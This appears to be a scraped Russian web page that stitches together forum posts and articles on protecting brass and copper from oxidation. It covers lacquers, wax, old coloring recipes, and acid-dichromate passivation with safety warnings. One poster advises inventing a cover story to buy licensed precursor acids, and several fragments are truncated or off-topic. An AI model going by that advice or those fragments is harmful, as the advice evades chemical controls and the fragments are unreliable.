102 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как защитить латунь от окисления

Как защитить латунь от окисления

И что — добавки помогают ? Химические элементы ?
В чем ныне (после изобретения масс-спектрометра способного выдать элементный состав любого материала со сверхвысокой точностью) их секретность ?

«Готовая итальянская бронза» надо сказать достаточно устойчива к потемнению, но к сожалению залапанная все равно темнеет и даже очень. Природу не обманешь . Серебрить. мелочь невыгодно абсолютно

Пытался найти решение вопроса — не удалось. Лаком крыть. как-то «некруто», тогда уж из ЦАМа делать и сверху красочкой . Но это уже лажа какая-то получится
Впрочем, если кто достучится до специалиста, и поделится информацией, то попробуем конечно и лаки.

Пользователь
Регистрация: 26.06.2006
Откуда: ekb

Сообщений: 108
В друзьях у: 0
Голосов: 0 / 0

Пользователь
Регистрация: 07.06.2007
Откуда: Санкт-Петербург

Сообщений: 609
В друзьях у: 0
Голосов: 0 / 0

Пользователь
Регистрация: 26.06.2006
Откуда: ekb

Сообщений: 108
В друзьях у: 0
Голосов: 0 / 0

Пользователь
Регистрация: 07.06.2007
Откуда: Санкт-Петербург

Сообщений: 609
В друзьях у: 0
Голосов: 0 / 0

Пользователь
Регистрация: 26.06.2006
Откуда: ekb

Сообщений: 108
В друзьях у: 0
Голосов: 0 / 0

Пользователь
Регистрация: 07.06.2007
Откуда: Санкт-Петербург

Сообщений: 609
В друзьях у: 0
Голосов: 0 / 0

Пользователь
Регистрация: 11.06.2007
Откуда: Москва

Сообщений: 41
В друзьях у: 0
Голосов: 0 / 0

Пользователь
Регистрация: 07.06.2007
Откуда: Санкт-Петербург

Сообщений: 609
В друзьях у: 0
Голосов: 0 / 0

Пользователь
Регистрация: 07.06.2007
Откуда: Санкт-Петербург

Сообщений: 609
В друзьях у: 0
Голосов: 0 / 0

Что вы так насели на утверждение о том, что элементный состав можно определить я прям не знаю, ведь можно .
Как этим потом пользоваться дело десятое.

Немярно крутые химики со стажем, которые ищут к
чемуб докопаться дальше могут не читать, чего свое
время тратить. и нервы у вас целее будут и форум у нас
чище

Абсолютно с вами согласен, ничего идеального не бывает.
Однако есть большое сомнение в том, что нужна высокая точность.
Ее не могли обеспечить 200-300-500 лет назад. Или могли ?
По работе имел дело с измерительными приборами используемыми при варке стали (впрочем не как пользователь), создалось стойкое впечатление, что элементный состав получить можно и очень точный.
Такой точный, что фиг я так точно сварю в маленькой мастерской.

И опять-таки абсолютно с вами согласен.
Загвоздка именно в приготовлении, а не в элементном составе.
Именно поэтому и был вопрос, «в чем секрет ?», полагаю, что
добавки к бронзе доступные 300-500-1000лет назад были
весьма ограничены по номенклатуре.

Можно. Согласен. Где ?
Где приобрести нетемнеющую бронзу ?
Все, что пробовал фирменные все равно темнеют, хоть тресни.
Может что не так делаю ?

Опять-таки в свете секретов старых мастеров, можно конечно купить и их, если производитель еще жив. Я так понимаю речь шла об вполне исторических секретах. Кто тут из производителей какой-нибудь царь пушки в очереди первый свой секрет продавать ? (оставим за бортом необходимость отколоть от нее кусочек .

Современные сплавы и материалы очень сложны и их анализ действительно подчас бессмысленное дело, однако лично у меня
есть суровое сомнение в том, что 500-1000лет назад было подобное
сегодняшнему обилие материалов, скорее всего сплавы были не в пример проще, впрочем вам оно виднее.
С другой стороны и непотемневшей бронзы я что-то по музеям не видел . Вы видели ? Она бывает ?

Как защитить латунь от окисления

Ювелирные изделия из меди ценятся не только за красоту, но и, как считается, за полезные для здоровья свойства.

Но в отличие от более дорогих изделий из золота, медным украшениям требуется небольшой уход, чтобы избежать окисления.

При окислении медные кольца и браслеты не только покрываются налётом, они еще и оставляют некрасивые зелёные пятна на коже. Такое случается, когда медь вступает в реакцию с воздухом и водой, в результате чего образуется карбонат меди.

Окисление меди, хотя и выглядит некрасиво, вреда здоровью не приносит, но при надлежащей очистке и ежедневном уходе его можно избежать.

  1. Тщательно чистите медное изделие кислотным чистящим средством и, при необходимости, зубной щёткой. В магазинах можно найти много подходящих чистящих средств, но в лимонном соке, уксусе и даже кетчупе тоже содержится достаточное количество кислоты для базовой чистки, а соль можно использовать в качестве абразивного вещества для оттирания самых упрямых пятен.
  2. Ополосните медное изделие, чтобы смыть с него чистящее средство, а затем нейтрализуйте оставшуюся кислоту. Окуните изделие в смесь из 1 части пищевой соды и 16 частей воды.
  3. Опять ополосните украшение чистой водой и высушите. Смажьте все поверхности изделия ксилоном или денатурированным спиртом. Подождите, пока оно полностью высохнет.
  4. Покройте медное изделие тонким слоем воска и полируйте до блеска. Воск для ювелирных изделий можно приобрести в ювелирном магазине, но отлично подойдёт и воск для автомобилей.
  5. Перед сном обязательно снимайте все украшения из меди и вытирайте их мягкой чистой тканью, чтобы очистить от пота и жира. После таких ежедневных процедур медное украшение реже нуждается в чистке и полировке для сохранения наилучшего внешнего вида.

Примечания:

  • Для более длительной защиты смазывайте медное изделие вместо воска полирующим покрытием на основе растворителя.
  • Будьте осторожны, когда чистите изделие с патиной или состаренную медь.

ShipModeling форум моделистов Верфь на столе

Защита латуни

Защита латуни

Kamshilin » Пт июл 20, 2007 16:37

arik » Вс июл 22, 2007 18:19

Выдержка из книги:
Справочник кустаря
Печать по книге ‘ Производственная техно — химическая рецептура »
составитель Г. Г. Бродерсон 3 издание Москва 1931 г.
OCR Сергей Каштанов Mail : kserh@yahoo.com март 2001г.

«. г) В золотистые цвета. I) Мелкие латунные вещи, как пуговицы, замочки, пряжки и т. п., могут быть окрашены в золотисто-желтый цвет — погружением их на медной проволоке в нейтральный раствор уксуснокислой меди. Раствор должен быть вполне нейтральный, т. е. не изменять цвета ни красной, ни синей лакмусовой бумаги. Нейтрализацию его, в случае надобности, производят уксусной кислотой.
II) Берут 4 едкого натра, 4 молочного сахара и 200 воды и кипятят в продолжение 15 мин., прибавляя постепенно 4 концентриров. раств. медного купороса. Готовую смесь охлаждают и затем в нее кладут латунные вещи, предварительно очищенные от жирных пятен. После непродолжительной ванны латунь принимает красивый золотисто-желтый оттенок.
III) Мелкие латунные вещи, напр. пуговицы, замочки, пряжки и т. п. могут быть окрашены в золотисто-красный цвет — натиранием смеси из 4 промытого мела (в порошке) и 1 сусального золота, смоченных водою до консистенции кашицы. Сусальное золото есть не что иное, как сернистое (двусернистое) олово; оно похоже цветом на настоящее золото и, подобно последнему, не изменяется от атмосферных влияний.
IV) Для придания меди золотисто-красного (оранжевого) цвета, погружают ее после тщательной чистки, на несколько секунд в раствор кристал. яри-медянки.
V) Растворить 15 г серноватистокислого натрия в 30 г воды, прибавить 10 г раствора хлористой сурьмы, подогреть до кипения, профильтровать и получившийся красноватый осадок промыть в фильтре несколько раз и разбавить его в 2-3 л. горячей воды. Нагревая, прибавить столько крепкого раствора едкого натра, пока осадок не растворится. Погрузить латунные изделия в горячую жидкость и оставить в ней, пока они не окрасятся в желаемый цвет. . »
Сам не пробовал.

Можно еще попробовать здесь: http://www.mnogo.biz/info_ebook.asp?ipdt=58720
Правда тут за деньги — вроде 1$

Kamshilin » Пн июл 23, 2007 9:47

Kamshilin » Ср июл 25, 2007 9:52

Kamshilin » Пн июл 30, 2007 10:32

Сменил название темы дабы привлечь внимание именно к сути вопроса.

А суть вопроса в предыдушем посте. Какие методы защиты латуни наилучшим образом применимы в домашних (полудомашних) условиях.
Заранее благодарен всем поделившемся своим опытом.

solom » Вт июл 31, 2007 8:40

Kamshilin » Вт июл 31, 2007 9:37

С колько времени уже стоит лак? Как меняется (не меняется) вид на глаз?

solom » Вт июл 31, 2007 15:51

Лак стоит полтора года, ничего не происходит, ни трескается, ни лохматится. Меняется? — меняется сразу как лаком покрыл, к лучшему.
Попробуйте воск, чтоб глянец убрать, может быть красивей выйдет

Kamshilin » Ср авг 01, 2007 10:48

Kamshilin » Ср авг 01, 2007 10:48

solom » Ср авг 01, 2007 18:02

Kamshilin » Чт авг 02, 2007 12:32

solom » Чт авг 02, 2007 21:51

Kamshilin » Пт авг 03, 2007 11:49

Бомбардирный кеч «La Candelaria» 1:85 OcCre

Vladimir Lomov » Чт дек 01, 2011 17:11

В моем магазине появились новые украшения! При их создании использовалась техника художественное травления металла. Так как травление у меня по меди, передо мной возникла задача защитить свои творения от воздействия внешней среды, то есть от окисления отполированных частей украшения. Я, конечно же, начала бороздить просторы интернета и вот что нашла. Существует много лаков для металла: керамические лаки, лак для плат PLASTIK 70, лак цапон и так далее. На разных сайтах много за и против всех лаков. Кто то вообще против всех лаков, так как украшение перестает быть живым и изменяться. Я тоже придерживаюсь этой позиции, но столкнулась с проблемой сырого климата. После каждой ярмарки украшение покрывалось патиной самостоятельно и приходилось полировать их заново. Если вы обладатель одного украшения, то отполировать его дело 5 минут, а если вы мастер и украшений у вас много, то это становится затруднительно.

Так вот для себя я выяснила одно, что лака, который навсегда защитит патинированный металл от дальнейшего окисления вроде бы нет. Потому что под лаком все равно продолжается окисление металла и из за этого лак со временем разрушается. Металл снова начинает темнеть и окисляться.

Я решила испробовать лак цапон, так как он продается в строительных и хозяйственных магазинах, в общем общедоступен. Для начала нужно обезжирить металлический предмет (я использовала соду), затем просушить и покрыть лаком с помощью кисточки с одной стороны, а когда просохнет с другой. Желательно покрывать 2-3 раза каждую сторону. Под лаком металл не потемнел, только стал более блестящим.

Металлы медь и латунь подвержены окислению, поэтому и темнеют. Если Вам нравятся украшения из этих металлов, то будьте готовы к этому при их покупке. Блеск любимого украшения легко восстановить, отполировав его салфеткой для ювелирных украшений, а если хотите более долгий эффект, можете покрыть лаком. Украшения покрытые лаком не оставляют следов на одежде и коже, а так же не вызывают аллергии.

Надеюсь, мое маленькое исследование окажется для кого-нибудь полезным. =)

Всё о цветных металлах и сплавах (бронза, медь, латунь и др)

Бронза | Латунь | Марки БрАЖ БрОФ ОЦС Л63 ЛС59 | Характеристики | Применение | Расшифровка | Латунный лист | Втулка | Бронзовая труба | Пруток | ГОСТ | Продажа | Блог | Применение | Втулки | Трубы

С форумов о пассивировании латуни

Требуется освоить пассивирование латуни. Из рецептов знаю только серная кислота+азотная и потом хромпик. Но возиться с кислотами без крайней нужны нет желания. Не подскажите ли уважаемые коллеги нет-ли какой более современной и менее вредной химии. Может из области ювелирной практики… Или может какой достойный лак бывает.

Выдержка из книги:
Справочник кустаря
Печать по книге ‘ Производственная техно — химическая рецептура »
составитель Г. Г. Бродерсон 3 издание Москва 1931 г.

«… г) В золотистые цвета. I) Мелкие латунные вещи, как пуговицы, замочки, пряжки и т. п., могут быть окрашены в золотисто-желтый цвет — погружением их на медной проволоке в нейтральный раствор уксуснокислой меди. Раствор должен быть вполне нейтральный, т. е. не изменять цвета ни красной, ни синей лакмусовой бумаги. Нейтрализацию его, в случае надобности, производят уксусной кислотой.
II) Берут 4 едкого натра, 4 молочного сахара и 200 воды и кипятят в продолжение 15 мин., прибавляя постепенно 4 концентриров. раств. медного купороса. Готовую смесь охлаждают и затем в нее кладут латунные вещи, предварительно очищенные от жирных пятен. После непродолжительной ванны латунь принимает красивый золотисто-желтый оттенок.
III) Мелкие латунные вещи, напр. пуговицы, замочки, пряжки и т. п. могут быть окрашены в золотисто-красный цвет — натиранием смеси из 4 промытого мела (в порошке) и 1 сусального золота, смоченных водою до консистенции кашицы. Сусальное золото есть не что иное, как сернистое (двусернистое) олово; оно похоже цветом на настоящее золото и, подобно последнему, не изменяется от атмосферных влияний.
IV) Для придания меди золотисто-красного (оранжевого) цвета, погружают ее после тщательной чистки, на несколько секунд в раствор кристал. яри-медянки.
V) Растворить 15 г серноватистокислого натрия в 30 г воды, прибавить 10 г раствора хлористой сурьмы, подогреть до кипения, профильтровать и получившийся красноватый осадок промыть в фильтре несколько раз и разбавить его в 2-3 л. горячей воды. Нагревая, прибавить столько крепкого раствора едкого натра, пока осадок не растворится. Погрузить латунные изделия в горячую жидкость и оставить в ней, пока они не окрасятся в желаемый цвет. … »
Сам не пробовал.

Есть раздел на Ювелирном форуме Города мастеров

Теперь у меня есть Латунный накопитель для Бени из Мастерской ivanh00ev и rvg1. И хотя антикоррозионные свойства латуни не в пример выше люминия, но, как свидетельствуют неумолимые факты, это все же не нержавейка, и поэтому ее обязательно как-то защитить. Вопрос — как?

Кто-нить пробовал эти рецепты в деле?
Хотя, похоже, защиту поверхности от окисления дает лишь 1-й и 2-й методы, остальные — лишь цветная декорация.

(c) «Медное кольцо за золотое продал» (к/ф «Адьютант его превосходительства»)

Не дождался ответа, потому сам первый и попробовал.
Причем первый рецепт, который, как мне кажется из составов и процессов, наиболее надежно защищает латунь от окисления.
Он же и самый трудоемкий и небезопасный —

Вот вам первые блины. Разницу ощущаете?

Накопитель для Benjamin 297

Хорошо видна разница, что после пассивации исчезает стальной отблеск и поверхность становится ярко-желтой и матовой.

1. Самым первым делом топаем в строительный магазин и покупаем защитные очки
— например, такие:

Потому что небрежность при работе с кислотами, тем более такими сильными, как серная и азотная, как правило, заканчивается очень печально…
Поставьте на чаши весов пластиковые очки стоимостью $3 и ваше бесценное зрение — и ваши шаги сами собой ускорятся в нужном направлении.

2.
Руки тоже стоит поберечь, поэтому отправляемся в аптеку и покупаем резиновые перчатки — десяток за доллар.
Руки в них от недостатка воздуха быстро потеют, и их придется часто менять.

3. В посудной лавке запасаемся баночками.
Их объем зависит от размера пассивируемых деталей.
Лучше выбирать объем баночек минимально необходимого объема — это даст экономию в реактивах.
Материал баночек может быть из пластика, за исключением емкостей для кислот — они должны быть обязательно стеклянными.
Причем, для смешивания кислот нужно сделать «матрешку» — баночка меньшей емкости помещается в баночку большей емкости.
Совсем не лишним будет сделать «тройную матрешку» — кислоты очень коварны, к тому же они сильно нагреваются при смешивании.

4. И наконец, отправляемся за химреактивами.
В любом городке масштаба губерния и выше обязательно найдется такой магазин — он обычно так и называется — «ХимРеактивы».
В нем, возможно, вам придется проявить чудеса изобретательности, чтобы купить три реактива — серную кислоту, азотную кислоту и двухромовокислый калий («хромпик»):

Серная кислота.
Может быть концентрированной, а может быть разбавленной. Нам нужна концентрированная.
Есть химически-чистая кислота, но для наших затей это необязательно.
Может продаваться в пластиковой таре, однако этот пластик особый — кислотно-щелочно упорный. Внешне выглядит как спокойная бесцветная маслянистая жидкостью, что-то вроде оливкового масла. Но не обольщайтесь — это очень грозная кислота!
Азотная кислота.
Эта кислота и вовсе ураган — на ней даже самолеты летают!
Даже внешне она выдает свой буйный характер — над ней всегда вьется кислотный «дымок», предупреждающий об опасности.
Данная кислота тоже бывает разных концентраций, и хотя концентрированная нам не обязательна, но желательна.

Старайтесь не ронять в эти кислоты другие химикаты, даже воду, и посторонние предметы — последствия могут быть непредсказуемыми!

Двухромовокислый калий.
Он же «хромпик». Вообще-то хромпики разные бывают, нам нужен именно этот — двухромовокислый калий.
Представляет собой кристаллический порошок красного цвета. Токсичен — потому и красный, природа иногда предупреждает нас об опасности.
Поэтому еще раз — очки, перчатки, отсутствие алкоголя в организме и предельная осторожность!

Ах да, чуть не забыл рассказать о чудесах изобретательности при закупке реактивов
Не знаю, как в матушке России, но в нашей незалэжной чья-то умная голова (видимо, более умная, чем были в Совдепии), додумалась наложить запрет на свободную продажу некоторых реактивов — обычной аптекарской «марганцовки», кислот и прочих химикатов, видимо, позволяющих с помощью нехитрых подручных средств создать то ли ядерный ректор, то ли наркокартель, наукой точно не установлено. Во всяком случае, забота о народе продемонстрирована, и список запрещенных к продаже реактивов — т.н. «прекурсоров» — утвержден, а бюджет государства за счет продажи лицензий — пополнен.
И поэтому на безобидную просьбу продать кислоту вас одернут окриком — «А лицензия на прекурсоры у вас есть?!»
Разумеется, откуда у вас, простого пневмоганнера, такая хитро…мудрая лицензия? У вас-то, поди, нет лицензии даже на пневматику, которая апнута до 30-40 Дж , не говоря уже о загадочных «прекурсорах».

Поэтому вы загодя готовите правдоподобную легенду «на кой вам эти кислоты», и тогда, если вы успешно пройдете фейс-контроль на отсутствие прирожденных черт террориста и приобретенных наркомана, продемонстрируете оба локтевых сгиба и сделаете 50 приседаний и 30 отжимов упор лежа, возможно, вас осчастливят и вы отправитесь домой, затаренный «прекурсорами»

PS. Свою легенду, сорри, изложить не могу, она должна быть уникальной, у каждого своя, иначе получится как с Паниковским, когда на высоком приеме он предстал третьим (после Бендера и Балаганова) «сыном лейтенанта Шмидта»

Далее личные заметки, можно не читать.
Результаты — просто офигенные!
И самый первый результат — надо того, кто опубликовал первым этот рецепт в Интернете (остальные были вынуждены были лишь растиражировать его), надо убить нах об стену! А если останется жив — добить из рогатки!
За то, что он обрезал исходный, наверняка полный и самодостаточный рецепт до куцого абзаца, оставив за кадром многие важнейшие особенности этого процесса, из-за чего дальше пришлось двигаться практически на ощупь, по интуиции. А ведь химия — наука весьма точная, и приблизительность, недомолвки в ней не катят, и более того — опасны!

Как защитить латунь от окисления

защитное покрытие латуни >>>

Ответов в этой теме: 10

Константин_Б
Пользователь
Ранг: 849

aversun
Пользователь
Ранг: 133

10.07.2007 // 21:39:20 aversun> Раньше, для предохранения астрономических посеребренных зеркал от потемнения применялася коллодий, растворённый в химически чистом эфире.

Коллодий — это раствор коллоксилина в спирто-эфире или в ацетоно-спиртовом смешанном растворителе.

А нитрат целлюлозы с содержанием азота порядка 12.6 %, полностью растворимый в спирто-эфире называется пироколлодий.

Вообще нитраты целлюлозы бывают:

1. Пироксилин No 1. Содержание азота от 13.1 и выше, до 13.6. Весьма слабо растворим в спирто-эфире. Норма растворимости — не более столько-то.
2. Пироксилин No 2. Содержание азота 12.2. 12.4. Полностью растворим в спирто-эфире. Норма растворимости — не менее столько-то (обычно 95, 96, 97%).
3. Пироколлодий. Содержание азота — промежуточное м/у пироксилинa No 1 и No 2. Полностью растворим в спирто-эфире.
4. Коллоксилин. Содержание азота — еще меньше, чем у пироксилина No 2, в районе 12.0%. Полностью растворим в спирто-эфире, пластифицируется нитроглицерином.

Это — общая классификация типов, а марок бывают чертова куча. Например www.mbnamenska.com/military.html — это боевые марки.
Есть еще динамитная, это высоковязкий коллоксилин: www.mbnamenska.com/dynamite.html Коллоксилинами являются и все марки промышленной НЦ ( www.mbnamenska.com/industrial.html ) , для лаков, красок, шпатлевок, целлюлоида. И для коллодия в том числе.

10.07.2007 // 22:00:45 Редактировано 1 раз(а)

По теме: лет 15 назад пришлось реставрировать микроскоп Reichert, почти такой:

Золоченная латунь, местами позолота стертая.

Начистил каждую деталь микроскопа и покрывал ее 0.1% раствором нитроцеллюлозы в ацетоне. Если пленка не нравилась из-за потеков, смывал и покрывал снова.

До сих пор нет особой разницы между золоченную и начищенную поверхность.

aversun
Пользователь
Ранг: 133

31.07.2011 // 23:01:55 Редактировано 2 раз(а)

Всем добрый день.
Есть серьезная и срочная проблема — очистка БОЛЬШИХ, ПЛОСКИХ, ВЕРТИКАЛЬНЫХ поверхностей и поручней перил, от следов рук. Материал — ЛАТУНЬ. Возможные варианты ДОЛГОСРОЧНОЙ защиты(!).
Вот фото:
s006.radikal.ru/i214/1107/6e/20a313247812.jpg
s014.radikal.ru/i327/1107/ba/52d56b74fffd.jpg
Спасибо.

31.07.2011 // 23:52:55 Редактировано 1 раз(а)

А попробуйте средства для чистки медных духовых инструментов
Современные — лакированные или посеребрянные. Следует выбрать средства для полировки посеребрянных поверхностей: www.musicworld-spb.ru/4pduh/page_02.html

Как вариант — использовать кухонные средства для полировки нержавейки

И после того, как начистите, покройте сильно разбавленным прозрачным лаком в два-три слоя.

Как ухаживать за украшениями

Часто случается так, что украшения с элементами медных или латунных компонентов темнеют и оставляют следы на коже. Такая реакция подталкивает рукодельниц на логичные вопросы: «От чего медь и латунь чернеют?» , «К ак можно этого избежать?» и «К ак правильно ухаживать за медными и латунными украшениями? » .

Конечно же, латунь и медь темнеют и окисляются — для металлов это обычная химическая реакция. Через некоторое время вы можете заметить , что украшения потеряли блеск и потускнели. Связано это с тем, что эти металлы довольно чувствительны к внешней среде. На них влияет абсолютно всё: температура среды, местное давление и изменения влажности воздуха, воздействие с кожей и потом.

Так например, от нагрева медь и латунь будут деформироваться и в скором времени потускнеют. От влажности металлы теряют устойчивость к коррозии, что приводит к окисной зеленой пленке. Соответственно в сухом помещении изделие покроется налетом позже. Но самый больший враг красивых украшений из меди и латуни — взаимодействие с кожей, что также сказывается в виде почернений металла. Эта реакция зависит в основном от уровня кислотности вашего организма. При высоких показателях — на вашей коже точно появится след от украшения, а само оно потеряет вид. Но отметим, реакция металла на ваше тело очень индивидуальна, так если кислотность повышенная, то медь и латунь потемнеют и оставят темные следы на месте, где было украшение (след от кольца или браслета). Если уровень кислотности в норме или понижен, то есть большая вероятность того, что украшения соприкасаясь с кожей долгое время не будут окисляться и оставлять следов. Отметьте, что и другие металлы чернеют от носки, в том числе серебро, золото и прочие благородные металлы окисляются при соприкосновении с кожей (хотя и в меньшей степени).

Такие тонкости следует знать и о них необходимо предупреждать. Будьте готовы, приобрета я украшения из латуни и меди — они могут потерять вид, а если по уходу за ними совсем не уделять времени, то вид они потеряют довольно быстро.

Ухаживать за медными или латунными деталями: бусинами, фурнитурой — не составляет сложности, достаточно регулярно чистить украшения, а для сохранения эффекта, можно использовать специальные средства защиты. Придерживайтесь следующих советов по уходу.

В качестве меры сохранности достаточно хранить украшения в раздельных пакетиках с зипом или в закрытой шкатулке в отсеке, отдельном от остальных металлов.

После носки необходимо протереть украшение. Это можно сделать обычной шерстяной тряпочкой. Такой уход позволит избавиться от жирного налета от кожи и других выделений, вредных для металлов. Более эффективное средство — специальная салфетка для полировки металлических компонентов фурнитуры — это ткань из микрофибры, пропитанная специальными составом. Салфетка предназначена для бережного ухода за металлическими бусинами и фурнитурой. Обработка такой салфеткой позволит избавится от вредоносных бактерий и предотвратить реакцию окисления, также сохранит эффект новизны на долгое время.

Эти советы помогут украшению сиять, но чтобы эффект новизны продлить, металл лучше дополнительно обработать в момент создания или покупки уже готового украшения. Металлические фурнитура, бусины, основы, цепочки, проволоки и другие детали украшения с целью предохранения покрывают Цапон-лаком. Цапон-лак — это специальное средство, рекомендованное многими мастерами рукоделия. Лак наносится на металлический компонент украшения, обволакивая его полностью, и способен защитить металлы от агрессивной внешней среды и реакций при взаимодействии с кожей.

Также существуют народные методы очистки, которым пользовались еще наши бабушки. Чистка уксусом, зубной пастой и др. Однако мы не можем гарантировать, что эти средства не нанесут вред покрытию , особенно если в украшении есть камни и мелкие элементы.

All-Audio.pro

Статьи, Схемы, Справочники

Защита латуни от окисления

Тема раздела Композиты и технологии применения в категории Модельные технологии ; Понятно , что из-за плохой адгезии, лак не держиться Может есть лаки, которые все же неплохо держатся на полированной Правила форума. Правила Расширенный поиск. Форум Модельные технологии Композиты и технологии применения Лакирование полированной латуни

Поиск данных по Вашему запросу:

Дождитесь окончания поиска во всех базах.
По завершению появится ссылка для доступа к найденным материалам.

Перейти к результатам поиска >>>

ПОСМОТРИТЕ ВИДЕО ПО ТЕМЕ: Пассивация меди и медных сплавов, защита от потускнения Unidip Cupro 4x

Как защитить украшения из меди от окисления.

Сообщение Vladislav. Сейчас этот форум просматривают: Google [Bot] и 2 гостя. Конфиденциальность Правила. Форум химиков Форум химиков Пропустить. Защита латуни от окисления пассивирование обсуждение проблем неорганической химии, неорганического материаловедения, химии твердого тела и всего, что с этим связано inorgancis, materials and solid state chemistry for professionals.

Я не химик, я работаю в компании которая делает латунные таблички. Поскольку латунь быстро окисляются на воздухе и теряет товарный вид буквально за месяц, мы их таблички покрываем лаком. Технология покраски лаком достаточно трудоемка и не дает того эффекта который хотелось бы. Поэтому решил обратиться к профессионалам с задаче делать на регулярной основе некий состав которым мы могли бы покрывать таблички и получать нужный эффект. Можно общаться и тут но на личную почту наверное удобней.

Готов также обсуждать и по телефону. Вернуться к началу. Почему вы думаете что пассивация будет менее трудоемкой Дело в том, что любая пассивация связана с покрытием оксидными пленками. А такая пассивация напрочь убьет весь эстетический вид полированной латуни. Можно покрыть пластину хромом или золотом, но боюсь это слишком увеличит и трудоемкость изготовления и себестоимость изделия. После этого нужно чем-то покрывать, что само по себе не видно или прозрачно, дает блеск или его не скрывает , и самое главное защищает от окисления.

Из предыдущих разговоров с разными людьми узнал о пассевирования к о технологии покрытия материала тонкой пленкой защищающей от окисления. Однако, процесс вредный и не экологичный. Гальванотехника 87 Ажогин Ф. Технологии эмалированных кастрюль. По затратности наверно «то на то и выйдет». Re: Защита латуни от окисления пассивирование Сообщение Vladislav.

Полированная латунь немного темнеет зависит от продолжительности выдержки , но блеск сохраняется долго, даже во влажных помещениях. При обработке в растворе No 1 образуется бесцветная пленка, которая предохраняет медь от потускнения.

В указанном растворе можно обрабатывать и медные, и латунные изделия. Раствор No 12 позволяет получить бесцветную защитную пленку на изделиях из латуни, а растворы No 13, 14, 15 предназначены для защитно-декоративного оксидирования меди и ее сплавов.

Кто сейчас на конференции Сейчас этот форум просматривают: Google [Bot] и 2 гостя.

Как почистить латунь – методы и средства очистки сплавов

Тема в разделе » Реставрация находок «, создана пользователем Солдат Швейк , 23 сен Войти или зарегистрироваться. Скрыть объявление. Гость , а вы уже пробовали что-то продавать или покупать на нашем аукционе? Предотвращение окисления латуни Тема в разделе » Реставрация находок «, создана пользователем Солдат Швейк , 23 сен

Лакирование металлов.

Войти Регистрация Восстановление пароля Вы можете войти через одну из учетных записей:. Вы можете войти через одну из учетных записей:. Получить ссылку на изменение пароля. Все Коллективные Персональные Найти. Как сохранить блеск полированной латуни или меди? Рано или поздно вы поставите перед собой эту цель! Приклеиваю и заливаю цапонлаком в несколько приемов. Металл тоже лакируется. Лак сошел почти везде, но картинку держит как влитую.

Предотвращение окисления латуни

Сообщение Vladislav. Сейчас этот форум просматривают: Google [Bot] и 2 гостя. Конфиденциальность Правила. Форум химиков Форум химиков Пропустить.

Лакирование полированной латуни .

Автор: Татьяна, 30 января, в Разное. У нас темнеет полированная проверхность деталей из латуни коррозия. Что можно сделать. Можно ли защитить лаком, если да, тогда каким? Заранее спасибо за совет. В зависимости от конечной цели примения латуни можно использовать несколько способов защиты поверхности:.

Справочник химика 21

Окт Курсы валют на Цены драгоценных металлов на В руб за 1г. Золото Платина Серебро Палладий

Как очистить латунь без химических средств

Автор: zumoshikiari , 21 июля в Органическая химия. Товарищи химики, помогите определится с одним вопросом. В общем история такая, решил бросить курить при помощи новомодных электронных сигарет. Ну и рукам делать было нечего, решил сделать что то свое.

Форум химиков

ВИДЕО ПО ТЕМЕ: Защита полированного металла

JavaScript seems to be disabled in your browser. You must have JavaScript enabled in your browser to utilize the functionality of this website. Изучена защитная эффективность композиций на основе нерафинированного рапсового и продуктов чистки отработавших нефтяных масел в условиях атмосферной коррозии меди и латуни Л62 при содержании в воздухе 0, Показано, что скорость коррозии исследованных конструкционных материалов может быть снижена в 3,5.

В моем магазине появились новые украшения! При их создании использовалась техника художественное травления металла. Кто то вообще против всех лаков, так как украшение перестает быть живым и изменяться. Я тоже придерживаюсь этой позиции, но столкнулась с проблемой сырого климата. После каждой ярмарки украшение покрывалось патиной самостоятельно и приходилось полировать их заново. Если вы обладатель одного украшения, то отполировать его дело 5 минут, а если вы мастер и украшений у вас много, то это становится затруднительно. Так вот для себя я выяснила одно, что лака, который навсегда защитит патинированный металл от дальнейшего окисления вроде бы нет.

Забыли пароль? Изменен п. Расшифровка и пояснения — тут. Автор: ROB , 16 февраля в Другие методы обработки.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 